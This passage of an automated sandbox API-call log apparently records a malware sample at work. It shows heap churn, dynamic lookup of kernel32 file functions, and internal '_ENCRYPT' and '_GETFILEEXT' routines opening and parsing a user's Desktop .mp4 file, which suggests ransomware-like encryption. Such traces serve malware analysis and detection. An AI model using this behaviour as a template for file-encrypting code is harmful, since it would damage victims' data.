lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0075.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.306] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0075.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696ad0 [0075.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.307] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.308] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.316] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.317] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.317] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.317] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.317] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.317] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.317] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.317] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.317] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.317] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.317] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.317] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.317] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76aee0 [0075.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76aee0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0075.317] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\i_yvzxv2vbg06xdhag1z.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.317] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0075.317] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.318] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.318] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0075.318] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.318] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.318] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.318] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ab68 [0075.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76ab68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.319] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.319] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.319] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0075.319] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0075.319] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.319] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0075.319] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.319] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0075.319] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.319] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0075.319] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.319] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.320] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.320] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.320] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaca41e0, ftCreationTime.dwHighDateTime=0x1d5e740, ftLastAccessTime.dwLowDateTime=0x9aebd660, ftLastAccessTime.dwHighDateTime=0x1d5e6d4, ftLastWriteTime.dwLowDateTime=0x9aebd660, ftLastWriteTime.dwHighDateTime=0x1d5e6d4, nFileSizeHigh=0x0, nFileSizeLow=0x1040, dwReserved0=0x0, dwReserved1=0x657690, cFileName="I_yvZxV2VbG06XDhaG1Z.mp4", cAlternateFileName="I_YVZX~1.MP4")) returned 0x6b89b8 [0075.320] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.320] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaca41e0, ftCreationTime.dwHighDateTime=0x1d5e740, ftLastAccessTime.dwLowDateTime=0x9aebd660, ftLastAccessTime.dwHighDateTime=0x1d5e6d4, ftLastWriteTime.dwLowDateTime=0x9aebd660, ftLastWriteTime.dwHighDateTime=0x1d5e6d4, nFileSizeHigh=0x0, nFileSizeLow=0x1040, dwReserved0=0x0, dwReserved1=0x657690, cFileName="I_yvZxV2VbG06XDhaG1Z.mp4", cAlternateFileName="I_YVZX~1.MP4")) returned 0x6b89b8 [0075.320] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S 